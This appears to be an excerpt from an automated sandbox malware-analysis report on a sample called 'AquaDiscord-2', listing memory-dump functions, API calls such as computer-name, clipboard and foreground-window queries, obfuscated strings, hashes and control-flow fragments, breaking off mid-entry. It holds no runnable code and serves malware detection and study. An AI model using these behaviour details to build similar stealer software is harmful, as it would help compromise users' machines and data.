                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: A0C303809269CACBC82A8148C6E54400$y
                                                                                          • API String ID: 0-3871108861
                                                                                          • Opcode ID: b35c5bb82a01e4a7c2276de52e7c42d158e759bc3991b7bdc95bf005c1ca11a9
                                                                                          • Instruction ID: d13ed370f9a74bd7b192be9fef28f454f71df1e5009caa2d1751917904e576f4
                                                                                          • Opcode Fuzzy Hash: b35c5bb82a01e4a7c2276de52e7c42d158e759bc3991b7bdc95bf005c1ca11a9
                                                                                          • Instruction Fuzzy Hash: F55128729083908BD724CB34CC516EFB7D3EBD6358F198A3DD8C9A7292E77549018746
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: 1076$@
                                                                                          • API String ID: 2994545307-367735841
                                                                                          • Opcode ID: 4fbbcb8d525073f89878eba708add4101803d8ad08485b0c83275c496f97ac63
                                                                                          • Instruction ID: 6080835bd154c549e24ed2745c425b690c6264ddf926f1aa5c5581f431cd1e19
                                                                                          • Opcode Fuzzy Hash: 4fbbcb8d525073f89878eba708add4101803d8ad08485b0c83275c496f97ac63
                                                                                          • Instruction Fuzzy Hash: 0C414370A043008BE704CF25D88176BB7E1EF95328F44862EF998573A1E7799909C78A
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042D398
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID:
                                                                                          • API String ID: 3545744682-0
                                                                                          • Opcode ID: a8cd61548bb627cd29eb74a14310a77809775b5788a73ff04523b65aa42a5ad7
                                                                                          • Instruction ID: 9c47b220125fd7b37665d45bd4979fc666182093a46d2320396b4aa24af95e72
                                                                                          • Opcode Fuzzy Hash: a8cd61548bb627cd29eb74a14310a77809775b5788a73ff04523b65aa42a5ad7
                                                                                          • Instruction Fuzzy Hash: 1C21C4766487428BE3208F7CEC923DBBBE69FC6314F68857DD598C7291DB7884068B01
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043CFFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: aedaec0e2d58949988fc3ab68ae91bb68b8f1b976ef8575a48542654c1965c67
                                                                                          • Instruction ID: 1f346047a94a575cb9e9090b5b75e991c9877b57263cff9fb7a1015185431757
                                                                                          • Opcode Fuzzy Hash: aedaec0e2d58949988fc3ab68ae91bb68b8f1b976ef8575a48542654c1965c67
                                                                                          • Instruction Fuzzy Hash: B0D0C930490220AAE2152F119D19F16BE34EB53343F025070B105260B38A30D935CAAD
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(00441F2A,00000002,00000018,?,?,00000018,?,?,?), ref: 0043EEEE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ]B
                                                                                          • API String ID: 0-3526754052
                                                                                          • Opcode ID: 1fd6be1f3779e7f1b2b7231725d9d40c36712ed4fae440efb7f288a22ef19163
                                                                                          • Instruction ID: abee60704e6455fbf7b09025d8f3e9bde1ba2f3748414ee61b19bc2f054f4bbe
                                                                                          • Opcode Fuzzy Hash: 1fd6be1f3779e7f1b2b7231725d9d40c36712ed4fae440efb7f288a22ef19163
                                                                                          • Instruction Fuzzy Hash: F32157A1F1821187D310AF39CC51227B2E2EF92324F49862DE4D6CB396F73C9A41C796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @
                                                                                          • API String ID: 2994545307-2766056989
                                                                                          • Opcode ID: 19a6e7360f83f39a3bdc91fe7abb6694e0420bf29f5f5c56e213f680fde1b919
                                                                                          • Instruction ID: a46e369d106a639218644783b4726d9be4fc316d03f01d76ce16d15d354cb5da
                                                                                          • Opcode Fuzzy Hash: 19a6e7360f83f39a3bdc91fe7abb6694e0420bf29f5f5c56e213f680fde1b919
                                                                                          • Instruction Fuzzy Hash: 9121AD741083049BD310CF59D88166BB7F4FB8A324F14593DFA9887391D379D8598BAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 40f5f1595bb43a5231ce2cdf028601ad03ac207bb4dfd4b317dc7fd636096d1e
                                                                                          • Instruction ID: 7b9b9bec463f649fdb6d53fd540be9c05b20f5d4e57a854244decb507e84e9ce
                                                                                          • Opcode Fuzzy Hash: 40f5f1595bb43a5231ce2cdf028601ad03ac207bb4dfd4b317dc7fd636096d1e
                                                                                          • Instruction Fuzzy Hash: EBC18F71B183614BDB14CE29E88166BB393EBD1314F9B853EE98587385D73CDC068399
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c67ccd4bc8fea41b065f08100cb3a35495d4ca712ca25f06c216555991bb6308
                                                                                          • Instruction ID: b77085b18b636790fe0e7c692a17d30303a8a7faa170c9887c77d76401ebd4ee
                                                                                          • Opcode Fuzzy Hash: c67ccd4bc8fea41b065f08100cb3a35495d4ca712ca25f06c216555991bb6308
                                                                                          • Instruction Fuzzy Hash: FA215B756493419BE300CF16CC86F2BB3A3E7D5300F14D53AE590972E5C7B8D8058749

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1890 42d41a-42d424 1891 42d426-42d431 1890->1891 1892 42d44d 1890->1892 1893 42d440-42d449 1891->1893 1894 42d451-42d481 1892->1894 1893->1893 1895 42d44b 1893->1895 1897 42d490-42d4aa 1894->1897 1895->1894 1897->1897 1898 42d4ac-42d4b6 1897->1898 1899 42d4cb-42d521 GetComputerNameExA 1898->1899 1900 42d4b8-42d4bf 1898->1900 1901 42d4c0-42d4c9 1900->1901 1901->1899 1901->1901
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042D4E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: fy`T$pwut
                                                                                          • API String ID: 3545744682-1831210788
                                                                                          • Opcode ID: 14bab3bf3b9f2bcd7640dc34512b6f924e17cdd87a41c78f647d25e089ed0ca5
                                                                                          • Instruction ID: 1885bde83a69cb04e4bf2408e252280595401ea40af441bedd925f44b0c25624
                                                                                          • Opcode Fuzzy Hash: 14bab3bf3b9f2bcd7640dc34512b6f924e17cdd87a41c78f647d25e089ed0ca5
                                                                                          • Instruction Fuzzy Hash: 2A21F63450C3D18BDB248B34D8243FBBBD49F96315F580A5ED4CD87282C7389906CB56

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1902 42d414-42d481 1904 42d490-42d4aa 1902->1904 1904->1904 1905 42d4ac-42d4b6 1904->1905 1906 42d4cb-42d521 GetComputerNameExA 1905->1906 1907 42d4b8-42d4bf 1905->1907 1908 42d4c0-42d4c9 1907->1908 1908->1906 1908->1908
                                                                                          APIs
                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042D4E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ComputerName
                                                                                          • String ID: fy`T$pwut
                                                                                          • API String ID: 3545744682-1831210788
                                                                                          • Opcode ID: bb8ef7e29fa2041b95833efbf863433c530e121e49a3d293443c341171389dfc
                                                                                          • Instruction ID: 3900cb29f253ed41e082e810bb159b9540be0b327d9fa7bfa8c3352265a65e98
                                                                                          • Opcode Fuzzy Hash: bb8ef7e29fa2041b95833efbf863433c530e121e49a3d293443c341171389dfc
                                                                                          • Instruction Fuzzy Hash: F511063460C7918BDB248B24C8287EBBBD49F86321F180A6DD4CE87281CB385902CB56
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 0043FAEB
                                                                                          • GetForegroundWindow.USER32 ref: 0043FAFC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ForegroundWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2020703349-0
                                                                                          • Opcode ID: d96aaea63885c3684cea54249a921a3c99d167502c47268bf736eb4e630661ef
                                                                                          • Instruction ID: 360bc417d1d8dd9390a0e24ce6050fade34dd00777f13f1fc800528296f11a8c
                                                                                          • Opcode Fuzzy Hash: d96aaea63885c3684cea54249a921a3c99d167502c47268bf736eb4e630661ef
                                                                                          • Instruction Fuzzy Hash: E4D0A7FDE421009BE3059B22FC0741A3716ABC321D7144838E80283322D9355535C5DF
                                                                                          APIs
                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 004389A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: DefaultLanguageUser
                                                                                          • String ID:
                                                                                          • API String ID: 95929093-0
                                                                                          • Opcode ID: a3bad94d319ff360a0d8b43d14b801486623d4b0de6c3ba806984507380aa086
                                                                                          • Instruction ID: 252dcf27f9fa6e433cc70b34e72e5d8f0341fedb36508920ab38289f71b5b6ca
                                                                                          • Opcode Fuzzy Hash: a3bad94d319ff360a0d8b43d14b801486623d4b0de6c3ba806984507380aa086
                                                                                          • Instruction Fuzzy Hash: CF119E749083948BCB54CB3899947E97BB16F5E320F0402EDD4CA973A2DA394A91CB1A
                                                                                          APIs
                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,0043A689,?,00004000,?,?,?,?,00000001,02DB7318,?,02DB7318,0041422A,?,02DB7318), ref: 0043EE80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: ff6e8024d7d04b7815bd8d9f02f2b81b673959d4091defb876d96e5cd63917c8
                                                                                          • Instruction ID: 3b8860b3b236ddac0589c6032d2567cac11010f5a4172126ef7003019655eb2c
                                                                                          • Opcode Fuzzy Hash: ff6e8024d7d04b7815bd8d9f02f2b81b673959d4091defb876d96e5cd63917c8
                                                                                          • Instruction Fuzzy Hash: B9F02735458210EBE3001F25BD06A1B36B9AFCF711F06043AF54953165DB39E822C69F
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: 78b47826cd9c7191f963fd9e12d95428478fb21e91424829ab5d201591ccd5f1
                                                                                          • Instruction ID: 82d7010dc274e219821205fbd216af7676d574a6d79836a4e5278f121af04f3e
                                                                                          • Opcode Fuzzy Hash: 78b47826cd9c7191f963fd9e12d95428478fb21e91424829ab5d201591ccd5f1
                                                                                          • Instruction Fuzzy Hash: 20F0BDB4105701CFE314DF24D0A4756BBF0FB89704F10581CE0958B390C7B5A948DF82
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy
                                                                                          • String ID:
                                                                                          • API String ID: 3890896728-0
                                                                                          • Opcode ID: febd1d751d134793378ae79c7edc84675fad8ca4d63014c10dd68467892fafa7
                                                                                          • Instruction ID: 57e039d0e3db240c334139bd82a1f6e00200c207c1351fc728b076e1a82f5ff5
                                                                                          • Opcode Fuzzy Hash: febd1d751d134793378ae79c7edc84675fad8ca4d63014c10dd68467892fafa7
                                                                                          • Instruction Fuzzy Hash: 66F0B2B46083428FE314DF28C5A871BBBE4ABC9308F10891CE5948B390CBB59948CF83
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,00414170,?), ref: 0043D041
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: cfb754c56096ded825b04b4428b46e666d5f2ebbf0f9e1d3715968d205b0c28c
                                                                                          • Instruction ID: 4a5130bfa37ba0c90ff3d4003636c7911055909ea7f0e2db61dbeeefdd43f40f
                                                                                          • Opcode Fuzzy Hash: cfb754c56096ded825b04b4428b46e666d5f2ebbf0f9e1d3715968d205b0c28c
                                                                                          • Instruction Fuzzy Hash: 70D01731059131EBE7102F58BC227863764EF8A322F0744B6A1005A076CA348C72CADA
                                                                                          APIs
                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C893
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 315b55ef2c81f16b799c4e38da1d9b3e058f0e204c0cab6ff3317bcd90d19787
                                                                                          • Instruction ID: eb3fa50a478c87baf5998608f04e651d4810f7e2c15724cbdbd46ab7fad430bc
                                                                                          • Opcode Fuzzy Hash: 315b55ef2c81f16b799c4e38da1d9b3e058f0e204c0cab6ff3317bcd90d19787
                                                                                          • Instruction Fuzzy Hash: A2D0A7355501846BD2006B5CFC57F163A2CE347765F800238B263DA1D1D9907910C5AA
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C8C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeSecurity
                                                                                          • String ID:
                                                                                          • API String ID: 640775948-0
                                                                                          • Opcode ID: f769ace39f8d5f5b88ab531ad7474c94707e777291cfd92fb59bed67981d25f7
                                                                                          • Instruction ID: e574dabc94603bd578d2f3871a0078f3cc67acac507f6305444acc64eb7ceff6
                                                                                          • Opcode Fuzzy Hash: f769ace39f8d5f5b88ab531ad7474c94707e777291cfd92fb59bed67981d25f7
                                                                                          • Instruction Fuzzy Hash: 1FD0C9383C83907AF6648708EC63F117215A743F21F300224B362FE6D0C9D071018A0D
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043CFFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 6ac0fb33b6a0edd37fa05207e1713f508a9d31a568ef396727efb2f7a1cb39bd
                                                                                          • Instruction ID: 86fa58a74cb7c37287574853b7c9aa3a2e8b22e14629bd9432e346f094e3d579
                                                                                          • Opcode Fuzzy Hash: 6ac0fb33b6a0edd37fa05207e1713f508a9d31a568ef396727efb2f7a1cb39bd
                                                                                          • Instruction Fuzzy Hash: 95B09230080120EAE2151F11AD09B053A34AB52342F0240B0B101140B28A309935CA9D
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000002,00000000,00000000,?), ref: 004171B5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: =N0L$IwA$O016$Q$RJSM$X2c0$\[\e$gfff$ke$}v$}v$VWT
                                                                                          • API String ID: 237503144-2405870987
                                                                                          • Opcode ID: 89fd62f29cb1f33de3a33cef1478d890648c6abbe3884c39f794b49a6aa1a58f
                                                                                          • Instruction ID: bffa345726b51c76a73c5f0c7d7699edc0ba153f300a5745b581033eb242c47b
                                                                                          • Opcode Fuzzy Hash: 89fd62f29cb1f33de3a33cef1478d890648c6abbe3884c39f794b49a6aa1a58f
                                                                                          • Instruction Fuzzy Hash: 4C8228729183518BC324CF29C8917ABB7F2FFC5310F19896DE8858B395E7389946C786
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                          • String ID: "$#$%$.$/$K$u
                                                                                          • API String ID: 2832541153-3922017006
                                                                                          • Opcode ID: e9c7e297a27e903fe21926105776f6d80fae10f0dbce1491966e4cf4d3ebcd9a
                                                                                          • Instruction ID: e89ca9f39744d96e7a045b5fcc5e7aecb6bb4e495cea4c0b541668d6ba7f2f1e
                                                                                          • Opcode Fuzzy Hash: e9c7e297a27e903fe21926105776f6d80fae10f0dbce1491966e4cf4d3ebcd9a
                                                                                          • Instruction Fuzzy Hash: 7B41BC7150C7818FD300AF78988936FBEE1ABE5318F09493EE4C587392D6788549875B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D]tS$JlxK$MCO{$TIIG$U{V_$XQ^@$jhq&$ryb~
                                                                                          • API String ID: 0-1178632756
                                                                                          • Opcode ID: 9a6ba5a05d67d7f56d871a33e8460bd0c2fb8cbd62bc22434cac8368c37395f6
                                                                                          • Instruction ID: 5b75185fb86b45141040d5e9b46c0ac5a7e5f247f01999525b5781695198bb6b
                                                                                          • Opcode Fuzzy Hash: 9a6ba5a05d67d7f56d871a33e8460bd0c2fb8cbd62bc22434cac8368c37395f6
                                                                                          • Instruction Fuzzy Hash: C3F121B560C391CFC7108F25A88166FBBE1AF9A308F04487EE9C557352D639D806CB5B
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429F70
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00429FF6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: B|zB$FxG~$`
                                                                                          • API String ID: 237503144-3359900383
                                                                                          • Opcode ID: 116511bb75e907b219308a623deef6e41a34fd5a468242b785800374cb6d2fce
                                                                                          • Instruction ID: bb8dba36a1d0319bbbb76b93e2e15360b571ed9d5291001c4d0d094f21b3f638
                                                                                          • Opcode Fuzzy Hash: 116511bb75e907b219308a623deef6e41a34fd5a468242b785800374cb6d2fce
                                                                                          • Instruction Fuzzy Hash: 46326876A083508FD3148F29E84166FB7E2BBC9314F598A7DE9C587381DB78D901878A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $%$0A;C$A0C303809269CACBC82A8148C6E54400$DE$sM/O$t$UW
                                                                                          • API String ID: 0-3075338575
                                                                                          • Opcode ID: 134623a633d13c8131fbc5e93eae74016705f1b4b4ad1ebedeeba70b155dc081
                                                                                          • Instruction ID: 1b412a982149fa6f93395a77e29896f7a75e14dc21355640186dd62c3daff885
                                                                                          • Opcode Fuzzy Hash: 134623a633d13c8131fbc5e93eae74016705f1b4b4ad1ebedeeba70b155dc081
                                                                                          • Instruction Fuzzy Hash: 13C128726083409BD718DF35C8516AFBBE6EBC2304F148A3DE4D59B395DA38C905CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2nA$Gl$Kz$Z<$[v$]G$}t
                                                                                          • API String ID: 0-4142317612
                                                                                          • Opcode ID: f9a28699d6b31238ebf079d96b8938e21f7f7c9835c25847d26b9e48ded2a9f9
                                                                                          • Instruction ID: db414186b08997a42f23d7f1092f780397a9a9a67ccbe03356ec6bbeb542239d
